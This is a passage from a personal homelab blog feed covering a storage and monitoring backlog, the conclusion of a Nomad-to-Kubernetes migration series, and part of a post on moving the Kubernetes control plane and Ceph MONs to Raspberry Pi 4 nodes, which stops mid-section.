I&rsquo;d then do the typical thing and create a WireGuard tunnel between that VPS and
my Homelab. One other thing I plan to use that VPS for is to get an outside
monitoring tool going, so I can actually get some indication of what&rsquo;s going
on when the Homelab completely crashes. Right now, my Gatus monitoring is running
in the k8s cluster it&rsquo;s monitoring. &#x1f605;</p>
<h2 id="ceph">Ceph</h2>
<p>Next up is Ceph. As I&rsquo;ve described in <a href="https://blog.mei-home.net/posts/ceph-copy-latency/">one of my previous posts</a>,
one of my HDDs regularly displays an appallingly low IOPS value. I need to
figure out whether it&rsquo;s actually bad or whether there is something else wrong.
But for that, I need to understand Ceph better. A lot better. There was also
some weird behavior when I was moving around hosts after taking down the
baremetal Ceph cluster, where the mlock scheduler was not using a disk&rsquo;s full
capacity while backfilling.</p>
<p>All of these I&rsquo;d like to investigate. For this, I will likely have to actually
read up on the algorithms behind Ceph, including the papers on CRUSH for
example. And then I might even dig into the code, because while the Ceph docs
themselves are pretty good, I&rsquo;d like to really understand what&rsquo;s happening behind
the curtain.</p>
<p>Related to the IOPS issues, I&rsquo;m also considering adding a SATA SSD to all of my
Ceph hosts to put the WAL and RocksDB on it, at least for the HDD OSDs. That
should improve overall performance for operations on my HDD pool, by releasing
the pressure from having to handle the payload and metadata IO from a single
HDD. The main issue with that is that one of my storage hosts is an
<a href="https://www.hardkernel.com/shop/odroid-h4/">Odroid H4</a>, and that only has two
SATA power and data connectors, both already in use. So that one would need to
be replaced by something else.</p>
<p>Finally, one of the things which has been annoying me for a while is the fact
that I&rsquo;m currently hardcoding the IPs for my Ceph MON daemons in several places.
Most importantly, in the Ceph configs for my netbooting hosts. That has the
effect that I can&rsquo;t easily move the MONs around. But it now looks like Rook added
functionality to put the MONs behind Kubernetes services. This would allow me
to move them without having to constantly update the configs and reboot hosts.
I still couldn&rsquo;t have them move around freely, because they&rsquo;re using the local
disk to store their data, but still, not having to worry about their IPs would
be nice.</p>
<h2 id="monitoring">Monitoring</h2>
<p>My beloved graphs. There are going to be more of them. But first, I need to
deploy Thanos for my Prometheus instance. Because that&rsquo;s currently got a 250GiB
persistent volume. And I will need to increase the size of that volume again
this week, as it&rsquo;s currently at 94% full again. And no, I will not be contemplating
reducing my retention period below five years, thank you very much. &#x1f605;
Thanos will allow the Prometheus TSDB to consume the entirety of my HDD pool,
and I will finally be free from needing to regularly increase the size.</p>
<p>Once that&rsquo;s accomplished, I want to get into gathering metrics from apps. Right
now, I&rsquo;m only gathering host metrics as well as Ceph and k8s metrics, but that&rsquo;s
pretty much it. But there&rsquo;s a lot of apps running in the Homelab which also provide
metrics, and I&rsquo;d like to gather those too. And make pretty graphs of them. &#x1f913;</p>
<p>One big one I&rsquo;d like to tackle is my blog. Right now, I&rsquo;ve got zero metrics there,
besides the number of requests hitting it as part of my generic web server
metrics gathering. But to be honest, I&rsquo;d like to know more. Purely for the
pretty graphs. I don&rsquo;t want to track anyone or anything like that. Just some
basic &ldquo;How often did this article get clicked&rdquo; graphs. So I might just go
with some log analysis. But I&rsquo;ve also been eyeing something like
<a href="https://plausible.io/">Plausible</a>. It&rsquo;s just because I really like a good
dashboard. &#x1f913;</p>
<p>And then there&rsquo;s the big elephant in my monitoring room. At the moment, I&rsquo;m
mostly seeing any issues when I&rsquo;m actively looking at my Homelab dashboard.
Or, you know, when I suddenly hear fans ramping up or HDDs start rattling like
mad. &#x1f605;
I&rsquo;d like to change that with some proper alerting. Perhaps even including
push notifications to <em>waves arms</em> somewhere. At least for the most important
stuff like SMART issues on my disks.</p>
<p>And finally, I&rsquo;ve been thinking about a public dashboard. Much reduced compared
to what I&rsquo;ve got internally, but perhaps just something like Pod CPU usage,
overall memory usage and stuff like that? I&rsquo;m wondering whether other Homelabbers
would be interested in something along those lines.</p>
<h2 id="the-k8s-cluster">The k8s cluster</h2>
<p>Only two short points here. One, I&rsquo;d like to get back into GitOps with Flux or
Argo. I explored it a bit in the past, but the fact that I&rsquo;d basically need
another cluster, or at least a separate Git forge/CI system put me off. But
with the plan to run a single-node management cluster in the future, it might
be interesting to look at this again.</p>
<p>Second, I&rsquo;d like to get something like <a href="https://github.com/renovatebot/renovate">renovate</a>
going for my k8s apps. Just so I can have a list of updates with links and
everything when Homelab Service Friday rolls around.</p>
<h2 id="backups">Backups</h2>
<p>And last, as they so often are, backups. Here, again, I&rsquo;d like to improve my
metrics. Restic can produce quite a lot of them, and I&rsquo;d like to gather those.
Again, mostly because I like pretty graphs. &#x1f913;
I even started implementing something a while ago, but never finished it. It&rsquo;s
a nice combination of implementing something in Python and Homelabbing, because
I&rsquo;ll likely use the Prometheus Push Gateway.</p>
<p>The biggest issue with my backups at the moment is the complete lack of off-site
backups. My backups currently consist of a battery of S3 buckets on my Ceph
cluster, each of which holds the restic backup repository for one of my services.
Then there&rsquo;s a large external HDD onto which I rclone the most important ones
daily. The biggest problem here is that said external HDD is sitting on the
top shelf of the rack that also holds the other servers in the Homelab. So
should anything physically happen to my Homelab, that second backup location
is also going to be gone.</p>
<p>My idea is to pretty much take the content of the HDD and sync it to a Hetzner
StorageBox. Or potentially make the backups a bit more independent and sync
the important S3 buckets to Hetzner directly, so the external HDD and the off-site
backups are a bit more independent.</p>
<h2 id="what-will-i-actually-do-next">What will I actually do next?</h2>
<p>I hope you enjoyed this tour through my Homelab backlog. It was pretty nice to
write a &ldquo;stream of conscience&rdquo; post like this, as compared to my normal
tutorial/here-is-what-I-did-and-why posts.</p>
<p>The last remaining question: What will I actually do next in the Homelab?
First step is going to be deploying the three Pi 5 with NVMe currently still
strewn all over my table. Once that&rsquo;s done, next will very likely be the Thanos
deployment. I&rsquo;m getting a bit tired of regularly increasing the Prometheus PVC&rsquo;s size.</p>
<p>And then, the next big project will very likely be the baremetal deployment
enhancement. I got myself a bit excited while writing about digging into the
Pi bootloader and trying to get it to chainload an iPXE.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Final: It&#39;s done</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-final/</link>
      <pubDate>Thu, 24 Apr 2025 13:40:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-final/</guid>
      <description>The migration is complete.</description>
      <content:encoded><![CDATA[<p>Wherein I try to draw a conclusion about my migration to k8s.</p>
<p>This is the final part of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>After a total of 26 posts, this will be the last one in the migration series.
On the evening of April 13th, after one year, three months and 26 days, I set the
final task of my k8s migration plan to &ldquo;Done&rdquo;. I made the first commits for the
migration on December 19th 2023, shortly after starting my Christmas vacation
that year. It was the addition of the first VMs, for the control plane nodes.
I already did some experimentation in November, but I don&rsquo;t count that as time
spend for the migration.</p>
<p>Overall, I had defined 864 tasks for the migration, most of them during the
initial planning phase.</p>
<p>Apropos planning phase: How did that turn out? In my <a href="https://blog.mei-home.net/posts/k8s-migration-0-plan/">first migration post</a>, I laid out in detail how I planned to proceed. And for the most part,
I did follow that plan. The one thing I did not foresee was that k8s does not have
a combined CronJob+DaemonSet kind of workload, meaning a run-to-completion workload
that can be started on a schedule with an instance running on every machine.
That was what I was doing with my backups in Nomad. But it wasn&rsquo;t possible
in Kubernetes. This lead me to the decision to put the migration on hold and
implement my very own Kubernetes operator for orchestrating my backups.
Besides that sidetracking, most things went according to the plan. Besides the very
last step, <a href="https://blog.mei-home.net/posts/k8s-migration-25-controller-migration/">migrating the controllers</a>.
In short, the Pi 4 with USB-attached SSDs were too slow to handle the control
plane. This will be remedied with some Pi 5 with attached NVMe SSDs next week,
but I didn&rsquo;t see any reason to postpone this post.</p>
<h2 id="nomad-vs-k8s">Nomad VS k8s</h2>
<p>Let&rsquo;s take a closer look at Nomad vs k8s. Starting with the number of allocations
I had in the Nomad cluster vs the number of Pods I have in the k8s cluster.
The two are not exactly comparable, but at least approximately.</p>
<p>In the Nomad cluster, shortly before starting the migration in December,
I had <strong>57</strong> allocations. While I currently have <strong>193</strong> running Pods in the
k8s cluster. This is of course partially because I&rsquo;m running more things in the
k8s cluster than I ran in the Nomad cluster. For example, each host already has
one more Pod than the Nomad hosts had allocations due to the Cilium Pod.</p>
<p>One big topic I&rsquo;d like to call out is the comparative maturity of the ecosystems,
meaning &ldquo;how much ready-made stuff is available?&rdquo;. For sure, the comparison is
slightly unfair - Kubernetes runs on all of the large cloud providers, it is
a full Linux foundation project, is used in many public and private clouds.
Nomad, on the other hand, is only supported and mainly developed by a single
company. As far as I&rsquo;m aware, there is no public offering for running Nomad
as a service for customers to run their own workloads on it. It&rsquo;s used in private
cloud deployments only, for the most part.</p>
<p>Take, as an example, Ceph. With <a href="https://rook.io/">Rook Ceph</a>, there is a very
good package for deploying a Ceph cluster into a Kubernetes cluster. There is no
such way in Nomad, at least to my knowledge. You can still deploy Ceph baremetal
and then use the official Ceph CSI driver in Nomad to control volumes, of course.
But that&rsquo;s not the same as a good piece of software allowing me to run the entire
cluster inside Nomad.</p>
<p>Then there&rsquo;s just the sheer generic support for tools of all stripes. For example
stuff like external-secrets or external-dns. Sure, Nomad has direct, and very good
support for Vault. But that&rsquo;s not even close to the level of support for secret
providers that external-secrets provides.</p>
<p>And finally, there&rsquo;s Helm. Again as far as I know, Nomad doesn&rsquo;t have anything
similar that&rsquo;s equally widely used. At the beginning, I was a bit hesitant
to use them. Instead I wanted to write all of them myself. I relented pretty
quickly, at least of the Helm charts which were provided by the projects
themselves. So I&rsquo;m fine with using e.g. Gitea&rsquo;s chart, because it was at least
supported by the Gitea project. But I wouldn&rsquo;t use a Gitea chart from a third
party, because the project itself will make its release announcements for the
methods they officially support, not for third party Helm charts. So for each
tool, I would have to read two release notes - the ones from the app itself,
and the one for the Helm chart. Sure, I also need to do that for first party
Charts, but at least there I can be reasonably sure that they got all the necessary
adaptions correct.
In Nomad, on the other hand, I wrote every single job and volume file myself.
This definitely fostered a better understanding of both, the app I wanted to
deploy and Nomad, but it does get a bit repetitive at some point.</p>
<h2 id="ceph-rook">Ceph Rook</h2>
<p>I would like to concentrate a bit on Rook Ceph here. One thing I would like to
highlight is that it worked really nicely for me, and I was able to reason
pretty well about what the operator would do - for the most part. See the malheur
with the controller migration for an example of how I completely screwed up
and almost lost my storage cluster.</p>
<p>But what I&rsquo;m still not certain about: Would I have been quite as comfortable with
Rook Ceph if I hadn&rsquo;t been running Ceph baremetal for a couple of years beforehand?
I have been brooding about this question since I added the point to the notes
for this blog post. But I got nowhere. I&rsquo;d like to be the kind of person who
can spew forth some nugget of wisdom, but I&rsquo;m starting to get the feeling that
I don&rsquo;t really have that much to say about the migration&hellip;</p>
<p>One thing I did get surprised about was the sheer number of auxiliary Pods
Rook puts up. In total, the operator namespace runs 41 Pods in my cluster, and
the cluster namespace runs another 28. I actually ended up considerably reducing
the resource requests for several Pod types, because after setting up Rook,
I pretty much ran out of resources on my initial small cluster.</p>
<h2 id="resource-utilization">Resource utilization</h2>
<p>So what does the comparison of the resource consumption look like? I haven&rsquo;t
been able to come up with something general that makes sense - there&rsquo;s more things
running now, due to stuff like external-secrets or external-dns for example,
which Nomad simply did not have. Overall, I&rsquo;m happy to report that I&rsquo;ve now got
more resources available for workloads, due to the simple reason that I&rsquo;ve got
the Ceph hosts as part of the cluster as well. And that allows me to use any free
resources on them as well.</p>
<p>One thing we can look at is the control plane nodes, because those are basically
doing the same thing in both clusters.
Under Nomad, those nodes were running the control plane
for the cluster, meaning one of each of these:</p>
<ul>
<li>Nomad server</li>
<li>Consul server</li>
<li>Vault server</li>
<li>Ceph MON daemon</li>
</ul>
<p>And it&rsquo;s basically the same in the k8s cluster control plane:</p>
<ul>
<li>kube-apiserver</li>
<li>kube-controller-manager</li>
<li>kube-scheduler</li>
<li>kube-vip</li>
<li>Ceph MON daemon</li>
<li>Vault Pod</li>
</ul>
<p>Here are the CPU loads. As a reminder, the machine we&rsquo;re talking about here is
a Raspberry Pi 4 4GB, with a SATA SSD attached via USB.
The load on an average day in 2023, before any k8s migrations, looked like this:</p>
<p><figure>
    <img loading="lazy" src="cpu-control-plane-2023.png"
         alt="A screenshot of a Grafana time series plot. It shows the CPU usage in percent for the different CPU states on a Linux system. The system, over the entire day, shows about 88% idle. Further around 6 percent is system load, with the remaining 6% being user load. A couple of spikes for IOWAIT load down to about 40% utilization are visible."/> <figcaption>
            <p>CPU utilization by CPU state on one of my Pi 4 control plane nodes on an average day before the k8s migration.</p>
        </figcaption>
</figure>

As you can see, the load is somewhere around 88% idle, with only a few IOWAIT
spikes down to only 60% idle.
Next is the same host, but from yesterday, now running the k8s control plane:
<figure>
    <img loading="lazy" src="cpu-load-control-plane-2025.png"
         alt="A screenshot of a Grafana time series plot. It shows the CPU usage in percent for the different CPU states on a Linux system. The system, over the entire day, shows about 76% idle, again with a number of IOWAIT spikes, this time deep down to less than 30% idle CPU. The usage is again split equally between Sys and User state. But in contrast to the previous graph, there&#39;s now also a visible bit of about 1% to 2% IOWAIT during the entire day."/> <figcaption>
            <p>CPU utilization by CPU state on one of my Pi 4 control plane nodes on an average day after the k8s migration.</p>
        </figcaption>
</figure>

Here the difference becomes clear - the k8s control plane needs about 10% more
CPU in total. In addition, there&rsquo;s now a clearly visible, constant 1% to 2%
IOWAIT during the entire day.</p>
<p>I believe the majority of this difference is not due to the k8s control plane
being inherently less efficient. Instead I think it&rsquo;s entirely due to operators.
In the Nomad cluster, the only requests made to the control plane were the ones
kicked off by me entering some command, and the normal chatter between the cluster
servers and the clients on the workers.
But in the k8s cluster, I&rsquo;ve got a number of operators running which all use
the k8s API, and hence need to make apiserver requests and ultimately etcd requests.
Just off the top of my head:</p>
<ul>
<li>The Prometheus operator, probably running at least a watch on a number of resources</li>
<li>The Cilium operator and the Cilium per-node Pods, which definitely contribute
to the load</li>
<li>The Rook operator, which needs to keep track of all the Ceph daemon deployments
as well as PersistentVolumeClaims</li>
<li>Traefik, which has to keep tabs on Ingresses as well as its own resources</li>
<li>External DNS and external secrets</li>
<li>My own backup operator</li>
<li>CloudNativePG, again with a number of deployments and own CRDs it needs to keep
an eye on</li>
</ul>
<p>I believe that all of these taken together put quite some load on the apiserver,
and hence on etcd. And that in turn might be too much for the USB-attached SSDs
on my control plane nodes. In contrast, the Nomad/Consul servers did not get
this many requests all the time.</p>
<h2 id="going-incremental">Going incremental</h2>
<p>The decision to do the migration slowly, with some extra capacity to run the
two clusters side by side was an unquestionable positive. Sure, it cost a bit
more due to the increased electricity consumption, but I think it was worth it.</p>
<p>Going incrementally mostly afforded me one thing: The ability to do things
properly right from the start. It allowed me time to start with the Rook cluster,
instead of first migrating to k8s and then migrating the baremetal Ceph cluster
to Rook. It left me the time to write extensive notes and to write blog post
on any interesting pieces of the migration.</p>
<p>In addition, the experimental phase I did before even starting the migration
was also a good idea in hindsight. It allowed me to get some basic setup going,
especially exploring <a href="https://github.com/helmfile/helmfile">Helmfile</a>. I promise,
I will be writing a post about that at some point as well. &#x1f642;
One thing though: I wish I had dug a bit deeper into the backups. I did have the
backup setup on the agenda, but for some reason I saw the CronJob and decided
that that did everything I needed. I only realized that that didn&rsquo;t do what I
needed when I actually got to the implementation of the k8s backups. It would
have been nicer to write the backup operator up front, instead of in the middle
of the migration.
Because running two workload clusters - Nomad/Consul and baremetal Ceph/Rook Ceph - was not actually that much fun.</p>
<h2 id="advantages-gained">Advantages gained</h2>
<p>I&rsquo;ve gained quite some advantages for my Homelab from the migration to k8s,
appart from the original goal of moving away from HashiCorp&rsquo;s tooling.
The first thing I&rsquo;d like to mention is how much I enjoy Kubernetes as &ldquo;platform&rdquo;.
I&rsquo;ve now got a lot more things running on a common platform - Kubernetes - than
I had before. My individual hosts contain a lot less configuration. It&rsquo;s basically
just the kubelet now, where before I needed Nomad and Consul agents which needed
to be manually configured, including generating tokens for each individual host.</p>
<p>In that same vain, I also like the fact that both Vault and Ceph are now running
in Kubernetes instead of individually. Don&rsquo;t get me wrong, it doesn&rsquo;t reduce
the maintenance for both that much, but I still got to remove quite some Ansible
code.</p>
<p>Another big one was virtual IPs. With my Nomad cluster, I had an &ldquo;Ingress&rdquo; host
which ran things like FluentD and Traefik which machines from outside the cluster
needed to access. And that host was fixed, it had all the firewall configured
and so on. When that host was down, access to my Homelab services was down. But
back then, I didn&rsquo;t see any other way. Although I could probably have done
something with e.g. HAproxy or the like?
But with my k8s cluster, I no longer have that problem. I&rsquo;m using Cilium&rsquo;s
BGP LoadBalancer functionality to provide routes to my different services with
a virtual IP. So for example my Traefik ingress can now be deployed wherever,
and Cilium would update the routes when the host changed.</p>
<p>Another one in the &ldquo;quite nice&rdquo; category is that I finally got rid of Docker
in my Homelab. The daemon was just annoying me from time to time. For example
there was a memory leak in the FluentD logging driver for several months a couple
of years ago. I&rsquo;m now running cri-o as the CRI for
Kubernetes, and it just feels a lot better. One of the big advantages is that I
can configure pull-through caches not just for DockerHub, but any registry,
without having to muck around with image locations in manifests or Helm charts.</p>
<p>And the final advantage is that I&rsquo;ve now got more things which I can control
with versioned code. This is especially visible in Ceph. Here, I can now create
S3 buckets via the ObjectBucketClaim instead of doing it manually on the command
line. The same goes for example for Ceph users or even CephFS volumes. And
the Rook team is continually improving the Ceph API support too, for example
with the addition of bucket policies for the ObjectBucketClaim.</p>
<h2 id="conclusion">Conclusion</h2>
<p>I had fun. That&rsquo;s really all there is to it, in the end, right? The best decision
of the entire migration was to make it so I could do it incrementally. I never
had any longer downtimes of any of the services in the Homelab I rely on. That
in turn meant that I could do it at my own pace. If I didn&rsquo;t feel like homelabbing
on a weekend, I didn&rsquo;t need to. The Homelab was always in a stable state I could
leave it at. It was interesting to dive into this new (to me) technology and
kick the tires, and I like what I ended up with.</p>
<p>The only two things which could have gone better was the backup situation for one,
and the performance/stability problems with the control plane for another.
It would have been more comfortable to have implemented the backup operator at
the beginning, instead of interrupting the migration for a couple of months.</p>
<p>So what&rsquo;s next? I will be starting another blog post right after this one where
I detail some of the larger ideas I&rsquo;ve got in mind. It would bloat this post a
bit too much to detail them here.</p>
<p>But short-term, I will work on replacing my control plane nodes with Pi 5 with
NVMe SSDs to hopefully fix the instability issues they&rsquo;re currently suffering
from. The last piece of hardware I was waiting for arrived today, and I will
likely get to it next week, as there&rsquo;s another long weekend in Germany. And then
I will get stuck into all the small and medium sized tasks that I&rsquo;ve been
postponing for the past 1.5 years. For example migrating to Forgejo from Gitea,
adding SSO support to some more services, cleaning up my log parsing and adding
some more services.</p>
<p>Finally, I&rsquo;ve greatly enjoyed accompanying the migration with this series of
blog posts. One thing I&rsquo;ve learned is that it is easier and more fun to write
a post about something when doing it right after the thing is done, instead of
putting the post on an ever-growing pile of posts to write at some point in
the future.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 25: Control Plane Migration</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-25-controller-migration/</link>
      <pubDate>Wed, 09 Apr 2025 23:47:45 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-25-controller-migration/</guid>
      <description>Migrating my control plane to my Pi 4 hosts.</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my control plane to the Raspberry Pi 4 nodes it is intended
to run on.</p>
<p>This is part 26 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>This one did not remotely go as well as I thought. Initially, I wasn&rsquo;t even
sure that this was going to be worth a blog post. But my own impatience and
the slowly aging Pi 4 conspired to ensure I&rsquo;ve got something to write about.</p>
<p>But let&rsquo;s start with where we are. This is very likely the penultimate post
of this series. By the time I&rsquo;m writing this, the migration is done:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>task proj:homelab.k8s.migration stats
</span></span><span style="display:flex;"><span>Category                   Data
</span></span><span style="display:flex;"><span>Pending                    <span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span>Waiting                    <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>Recurring                  <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>Completed                  <span style="color:#ae81ff">808</span>
</span></span><span style="display:flex;"><span>Deleted                    <span style="color:#ae81ff">48</span>
</span></span><span style="display:flex;"><span>Total                      <span style="color:#ae81ff">864</span>
</span></span></code></pre></div><p>Those last eight remaining tasks are just some cleanup. But tat the beginning
of the weekend, I still had one major thing to do: Migrating my control plane
from the three virtual machines it has been living on for over a year to the
three Raspberry Pi 4 4GB with attached SATA SSDs which have been serving as my
control plane before.</p>
<p>Control plane here means the k8s control plane, consisting of etcd, the
kube-apiserver, the kube-controller-manager and the kube-scheduler. In addition,
I had kube-vip running to provide a virtual IP for the k8s API. And the MONs of
my Rook Ceph cluster were running on there as well. And finally my Vault instances
are also assigned to those nodes.</p>
<p>While the kube control plane components probably don&rsquo;t need any explanation,
the other pieces do. Let&rsquo;s start with the Ceph MONs. Why put them here, instead
of on the Ceph nodes themselves? Mostly, habit, it was the setup I had previously.
Originally born from the thought that I might be running my Ceph nodes on Pi 4
as well. And on those hosts, memory would have been at a premium. I ended up not
going with that idea, but I still liked the thought of having control plane
nodes which run the servers/controller components of all my major services.
In the Nomad cluster setup, these nodes were running the Consul, Vault and
Nomad servers as well as the Ceph MONs. I liked that setup and decided to keep
it for the k8s setup. I couldn&rsquo;t run the MONs on any worker nodes, because none
of those have local storage. They all have their root disks on Ceph RBDs, which
means they could only run the MONs for that same Ceph cluster until the first
time they all went down at the same time. &#x1f609;</p>
<p>The reason for running Vault on the control plane nodes is one of convenience.
I&rsquo;ve got some automation for regular node updates. But my Vault instances need
manual unsealing. This means that after the reboot as part of the regular update,
I would need to manually unseal the instance on the host which was just updated.
This is fine in the current setup - the controllers are the first nodes to be
updated anyway, so I just need to pay attention right at the beginning of the
node update playbook. And after those nodes have been restarted and their Vault
instances have been unsealed, I can go and do something else.</p>
<p>So I needed to migrate the kube control plane and the MONs over to the Pis. I
would need to do the following steps:</p>
<ol>
<li>Setup Kubernetes on the three Pi 4</li>
<li>Join the three Pi 4 to the kube control plane</li>
<li>Add MONs on the three new nodes, for a total of 6 Ceph MONs</li>
<li>Add the new MONs to the MON lists and reboot everything</li>
<li>Remove the old control plane nodes</li>
</ol>
<p>The most complicated step here was the MON migration. That&rsquo;s due to the fact
that the MONs are generally configured via their IPs, so I had to change some
configuration. Specifically the configs outside the k8s cluster needed manual
adaption, and the most important config here was the MON list used by my
netbooting hosts to get their root disks. Just to make sure everything was okay,
I needed to reboot all netbooting hosts in my Homelab.</p>
<p>In preparation for the move, I fixed the MON deployments for Ceph to the existing
control plane nodes, to make sure that they were only migrated when I told them
to migrate:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephClusterSpec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mon</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;kubernetes.io/hostname&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp1&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp2&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp3&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoSchedule</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node-role.kubernetes.io/control-plane</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span></code></pre></div><h2 id="migrating-the-k8s-control-plane">Migrating the k8s control plane</h2>
<p>This was reasonably easy to accomplish. I just needed to join the three Pi 4
into the cluster as control plane nodes.</p>
<p>But here I hit my first stumbling block. While most components - notionally
including the Cilium Pod - came up, the Fluentbit Pod for log collection did
not. Instead, on both hosts, it showed errors like these:</p>
<pre tabindex="0"><code>[2025/04/10 22:16:59] [ info] [filter:kubernetes:kubernetes.0] local POD info OK
[2025/04/10 22:16:59] [ info] [filter:kubernetes:kubernetes.0] testing connectivity with API server...
[2025/04/10 22:17:09] [error] [net] connection #60 timeout after 10 seconds to: kubernetes.default.svc:443
[2025/04/10 22:17:09] [error] [filter:kubernetes:kubernetes.0] kube api upstream connection error
[2025/04/10 22:17:09] [ warn] [filter:kubernetes:kubernetes.0] could not get meta for POD fluentbit-fluent-bit-ls6tt
</code></pre><p>After some fruitless research, I found this line in the logs of the Cilium Pods
of the new control plane hosts:</p>
<pre tabindex="0"><code>Failed to initialize datapath, retrying later&#34; module=agent.datapath.orchestrator error=&#34;failed to delete xfrm policies on node configuration changed: protocol not supported&#34; retry-delay=10s
</code></pre><p>This brought me to the <a href="https://docs.cilium.io/en/stable/operations/system_requirements/#ubuntu-22-04-on-raspberry-pi">Cilium system requirements docs</a>.
And there it states pretty clearly that for the exact Ubuntu version I&rsquo;m running,
an additional package with kernel modules was needed. I didn&rsquo;t have any issues
with my Pi 4 worker nodes before, though. This was because those already had
the <code>linux-modules-extra-raspi</code> package installed, as that&rsquo;s needed for Ceph
support, and all of my worker nodes use Ceph RBDs for their root disks.
But the controller nodes never needed that, due to having local storage.</p>
<p>After installing the additional package, the new nodes worked properly. What I
found a bit disappointing was that the Cilium Pods did not show any indication
that anything was wrong, besides that single log line I showed above.</p>
<p>Another interesting sign that something was wrong was that I saw entries like
these in my firewall logs:</p>
<pre tabindex="0"><code>HomelabInterface		2025-04-11T00:34:59	300.300.300.4:39696	310.310.17.198:4240	tcp	Block all local access
HomelabInterface		2025-04-11T00:34:54	300.300.300.5:42022	310.310.19.209:2020	tcp	Block all local access
</code></pre><p>Which is odd, because the <code>310.310.0.0/16</code> CIDR subnet is my Pod subnet, and
those packets should really never show up at my firewall.</p>
<p>With that, my k8s control plane was up and running without further issue.</p>
<h2 id="how-not-to-migrate-mons">How not to migrate MONs</h2>
<p>Do not follow the steps in this section. I will speculate a bit on what I did
wrong, but I do not have another cluster to migrate to confirm what the right
way would be.</p>
<p><strong>This section is a cautionary tale, not a guide.</strong></p>
<p>So let&rsquo;s set the table. At the beginning of this, I had three MON daemons running
on the three old control plane nodes. Everything was fine. I planned to start
with replacing two old MONs with two new ones, leaving the one old MON available
to the netbooting hosts with their old configuration.</p>
<p>So I started out with just replacing two of the old nodes with two new ones in
the placement config for the MONs in the Rook Ceph cluster <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephClusterSpec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mon</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;kubernetes.io/hostname&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp1&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;newcp1&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;newcp2&#34;</span>
</span></span></code></pre></div><p>Deploying this did not work. This left the two MONs for <code>newcp1</code> and <code>newcp2</code>
in pending state, because the one remaining MON was too few. I then tried to
increase the number of MONs to five, with the three old nodes and the two new
ones. That brought my heart to a standstill with this message showing up in the
Rook operator&rsquo;s logs:</p>
